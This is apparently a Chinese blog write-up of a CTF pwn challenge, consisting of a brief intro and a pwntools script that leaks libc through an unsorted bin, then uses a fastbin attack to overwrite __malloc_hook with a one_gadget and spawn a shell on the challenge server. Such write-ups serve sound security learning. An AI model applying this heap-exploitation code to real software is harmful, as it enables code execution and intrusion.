starCTF unsorted bin leak & fastbin attack level5-unsortbin Writeup

wjh 收录于 Pwn

2020-11-19 2024-02-12 约 400 字预计阅读 1 分钟 - 次阅读 - 条评论

UNCTF2020中的babyheap，官方wp用的是unsorted bin attack修改fastbin最大大小。所以特意看了一下这题，结果发现这题是unsorted bin leak，不过不做白不做，花了一个小时做掉了。等一下会找一下unsorted bin attack的题目待补充…

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
# -*- coding: utf-8 -*-
from pwn import *
context.log_level = "debug"
#r = process('./level5-unsortbin')
r = remote("pwn.sixstars.team", 22505)
elf = ELF('./libc.so.6')
#elf = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
def add_note(size):
    r.sendlineafter(">> ", "1")
    r.sendlineafter("Size:", str(size))

def show_note(idx):
    r.sendlineafter(">> ", "2")
    r.sendlineafter("id:", str(idx))

def edit_note(idx, content):
    r.sendlineafter(">> ", "3")
    r.sendlineafter("id:", str(idx))
    r.sendlineafter("Content:", content)

def dele_note(idx):
    r.sendlineafter(">> ", "4")
    r.sendlineafter("id:", str(idx))


add_note(200)
add_note(0x68)
dele_note(0)
show_note(0)
#main_arena + 0x58 = leak addr
#main_arena - 0x10 = __malloc_hook
#__malloc_hook = leak_addr - 0x68
malloc_hook_addr = u64(r.recv(6).ljust(8, '\x00')) - 0x68
libc_base = malloc_hook_addr - elf.sym['__malloc_hook']

one = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
one_gadget = libc_base + one[2]
print "__malloc_hook: " + hex(malloc_hook_addr)
print "one_gadget: " + hex(one_gadget)

dele_note(1)
edit_note(1, p64(malloc_hook_addr - 0x23))
add_note(0x68)
add_note(0x68)

edit_note(3, 'a' * 0x13 + p64(one_gadget))
#gdb.attach(r)
dele_note(1)
dele_note(1)
r.interactive()